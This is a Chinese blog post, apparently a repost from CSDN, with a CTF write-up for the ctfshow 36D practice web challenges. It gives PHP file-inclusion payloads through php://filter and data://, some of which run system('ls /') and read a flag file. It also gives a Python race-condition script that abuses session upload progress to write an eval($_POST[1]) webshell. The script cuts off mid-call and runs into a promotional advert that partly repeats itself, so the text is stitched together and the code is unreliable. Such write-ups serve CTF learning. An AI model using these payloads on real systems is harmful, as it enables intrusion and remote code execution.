ctfshow-36D练手赛

于 2024-05-16 14:57:23 发布
阅读量292 收藏 10
点赞数 5
分类专栏: 程序员 文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84970121/article/details/138961722
版权

?file=test.
test.php
flag_not_here


 猜测文件包含,


传入:

?file=php://filter/convert.base64-encode/resource=test/…/index.


解码的得: 
<?php error_reporting(0); $file=$_GET['file']; $file=$file.'php'; echo $file."
"; if(preg_match('/test/is',$file)){ include ($file); }else{ echo '$file must has test'; } ?> 

playload:

利用data://协议,进行getshell。可以执行php命令。

/?file=data://text/plain,<?php system('ls /');?>test

/?file=data://text/plain,<?php system('cat /FFFFFFFL@GGGG');?>test


## easyshell


通过burp抓包

先随便传入,获取cookie,将获取的cookie放入pass,name不变

?name=2222&pass=0382dd97e8e5ccf50135efe75e822034


![](https://img-blog.csdnimg.cn/direct/d36978424d7e43859753e342bd349fa6.png)


 发现flflflflag.php,得到

可以通过php伪协议进行文件读取

通过目录扫描可以知道存在dir.php和config.php

include($_GET[“file”])

…dir.php
/flflflflag.php?file=php://filter/read=convert.base64-encode/resource=dir.php

<?php var_dump(scandir('/tmp')); ?>

…config.php
config.php
/flflflflag.php?file=php://filter/read=convert.base64-encode/resource=config.php

<?php $secret='%^$&$#fffd'; ?>

…index.php
/flflflflag.php?file=php://filter/read=convert.base64-encode/resource=index.php

<?php include 'config.php'; @$name=$_GET['name']; @$pass=$_GET['pass']; if(md5($secret.$name)===$pass){ echo ' '; }else{ setcookie("Hash",md5($secret.$name),time()+3600000); echo "username/password error"; } ?> ```

没有利用的漏斗页面,所以利用session文件包含(条件竞争)获取getshell。

'''
cookie为PHPSESSID=123,那么就会生成一个sess_123的session文件,此时php会自动初始化session,并产生一个键值,
格式为配置文件中的session.upload_progress.prefix的值+我们上传的session.upload_progress.name的值此键值会写入session文件。
该键值的格式应该为:upload_progress_+PHP_SESSION_UPLOAD_PROGRESS的值。

session.upload_progress.cleanup = on:表示当文件上传结束后,php将会立即清空对应session文件中的内容。该选项默认开启,需要条件竞争

session.use_strict_mode:默认情况下,该选项的值是0,此时用户可以自己定义Session ID。

session.auto_start:如果开启这个选项,则PHP在接收请求的时候会自动初始化Session,不再需要执行
session_start()。但默认情况下,也是通常情况下,这个选项都是默认关闭的。
'''

脚本如下:

import requests
import threading

url = 'https://bbbd23d4-0fc9-43f0-9da1-459d63e257bf.challenge.ctf.show/flflflflag.php'
sessid = 'getshell'

def POST(session):
    while True:
        session.post(
            url,
            data={"PHP_SESSION_UPLOAD_PROGRESS":"<?php file_put_contents('shell.php','<?php eval($_POST[1]);?>');?>"},
            files={"file":'shell.php'},
            cookies={'PHPSESSID':sessid}
## 最后

**自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。**

**深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!**

**因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。**

![img](https://img-blog.csdnimg.cn/img_convert/cfad65faa63c9401de1b00e4790988d2.png)

![img](https://img-blog.csdnimg.cn/img_convert/a80e4b289024088499ba151a70fd14c2.png)

![img](https://img-blog.csdnimg.cn/img_convert/cb9abc86840811f67e66fbe905e3a447.png)

![img](https://img-blog.csdnimg.cn/img_convert/6dc1f07c932689fbf300416faa1bcc81.png)

![img](https://img-blog.csdnimg.cn/img_convert/023a78e12b1499a692c8ee39a54d15d3.png)

 

**既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!**

[**如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!**](https://bbs.csdn.net/topics/618653875)

**由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!**

识点!真正的体系化!**

[**如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!**](https://bbs.csdn.net/topics/618653875)

**由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!**
2401_84970121
关注
  • 5
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctfshow 36D练手 web writeup
ashMOB的博客
10-30 1139
ctfshow 36D练手 web writeup 不知所措.jpg 对萌新友好 一进入就看到提示 php $file must has test 提示传参中需要包含test ?file=test试试 回显中少了$file must has test字样,且变成了testphp,尝试访问test.php 回显为flag_not_here 说明存在此文件,返回主页尝试传参?file=test. 回显为 test.php flag_not_here 猜测为文件包含,尝试包含主页源码 传参?file=php:/
ctfshow-VIP题目-Web-详细解题思路
01-27
CTFSHOW-VIP题目-Web-详细解题思路 本文档总结了CTFSHOW-VIP题目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制...
ctfshow 36D练手 超超超级详解 ==
梦想不是挂在嘴边炫耀的空气,而是需要认真实践,等到对的风,就展翅翱翔!
09-30 1291
1、不知所措.jpg 这题对我这个新手来说真的是一言难尽…太吃经验了,老手肯定是分分钟解决 打开页面,这里的意思是变量$file必须要有test 首先猜测变量$file是通过$_GET['file']GET请求得到的且为?file=test ??自动给我加了一个php 难道是存在一个test.php文件?尝试,输入test自动补php,index.php?file=test.php,这是一个文件包含? 也确实存在,貌似是文件包含,但是它说flag不在这儿 既然是文件包含,尝试用php:
ctfshow 36d
blowed的博客
03-18 1533
36D练手不知所措easy shell36D杯给你shellWUSTCTF朴实无华RevengeALL_INFO_U_WANT你取吧 36D练手 不知所措 $file 暗示参数为file 且url必须含有test ?file=php://filter/convert.base64-encode/resource=test/../index. ​ 解码得到源代码 <?php error_reporting(0); $file=$_GET['file']; $file=$file.'ph.
ctfshow web学习记录
m0_64815693的博客
09-25 2587
ctfshow 学习记录
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
【压缩包子文件的文件名称列表】"CTFshow-变量循环取值-我的眼里只有$" 提供了一个可能包含源代码、日志、测试数据或其他相关资源的文件。参者可能需要分析这个文件,寻找与题目相关的线索,比如错误的变量赋值、...
ctfshow-web41~60-WP
最新发布
02-21
ctfshow-web41~60-WPctfshow-web41~60-WP
CTFShow-周末大挑战parse-url篇Writeup
05-19
`%68%74%74%70%3a%2f%2f%64%61%74%61%3a%3a%2f%2f%74%65%73%74%2f%70%6c%61%69%6e%3b%62%61%73%65%36%34%2c`解码后是`http://data:://test/plain;base64,`,后面跟着Base64编码的PHP代码。这段代码解码后执行,实现...
ctfshow web223-group盲注无数字
10-21
ctfshow web223-group盲注无数字
CTFshow之36Dweb做题记录
bmth666的博客
08-08 2273
WEB_给你shell 打开题目首先F12,得到信息 那么?view_source=flag.txt得到了源码: <?php //It's no need to use scanner. Of course if you want, but u will find nothing. error_reporting(0); include "config.php"; if (isset(...
CTFshow 36D杯 web系列
羽的博客
05-05 3405
0x01 WEB_你取吧 题目源码 <?php error_reporting(0); show_source(__FILE__); $hint=file_get_contents('php://filter/read=convert.base64-encode/resource=hhh.php'); $code=$_REQUEST['code']; $_=array('a','b','c'...
CTFSHOW内部 web03_出题人不想跟你说话.jpg
羽的博客
03-30 1549
0x01 根据网站里面隐晦的提示,猜测可能需要连菜刀,而且图片上有个cai可能是连接的密码。 果然如此,那我们直接找flag吧,发现flag在根目录下,但是没有权限打开。那就得提权了 0x02 根据提示说漏洞每2分钟触发一次,猜测可能有定时任务可利用,cat /etc/crontab 这个定时任务很可疑呀 一分钟一次,在网上经过各种搜索发现了nginx提权漏洞CVE-2016-1247,大家有...
CTFshow 36D
Je3Z的博客
05-07 1200
WUSTCTF_朴实无华_Revenge 这个题真的感觉自己没脑子,五一玩傻了。。。。 <?php header('Content-type:text/html;charset=utf-8'); error_reporting(0); highlight_file(__file__); function isPalindrome($str){ $len=strlen($str); $l=1; $k=intval($len/2)+1; for($j=0;$j<$k
CTFSHOW萌新计划 web16-17
羽的博客
04-03 3029
题目地址 https://ctf.show 0x01 web16 这个直接爆破就可以了,但是如果你是官网群里的成员,就会知道有个36d的梗 payload=36d 爆破的话给个脚本 import hashlib str1='abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ' payload='' for i in str1...
菜鸡杯CTFshow部分wp
xiaolong22333的博客
09-01 643
讲道理,题目确实并没有很难,然而我实在是太菜了,只做出了一题。。。 ###web签到 (连web签到都不会,我觉得我可能不适合学web(○´・д・)ノ) <?php if(isset($_GET['url'])){ switch (strtolower(substr($_GET['url'], 0,4))) { case 'file': echo 'file protocol do not allow'; break;
CTFSHOW【萌新计划】Writeup
abtgu的博客
05-16 2730
CTFSHOW【萌新计划】web1【萌新计划】web2【萌新计划】web3【萌新计划】web4【萌新计划】web5【萌新计划】web6【萌新计划】web7【萌新计划】web8【萌新计划】web9【萌新计划】web10【萌新计划】web11 【萌新计划】web1 题目: 代码很安全,没有漏洞。 解题思路: 题目代码 <html> <head> <title>ctf.show萌新计划web1</title> <meta charset="u
ctfshow-web-web红包题
07-14
ctfshow-web-web红包题是一道CTF比中的网络安全题目。这道题目的背景是一个在线购物网站,要求我们通过安全漏洞来获得网站的红包。 首先,我们可以检查网站的源代码,寻找可能存在的漏洞。在网站的前端页面中,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值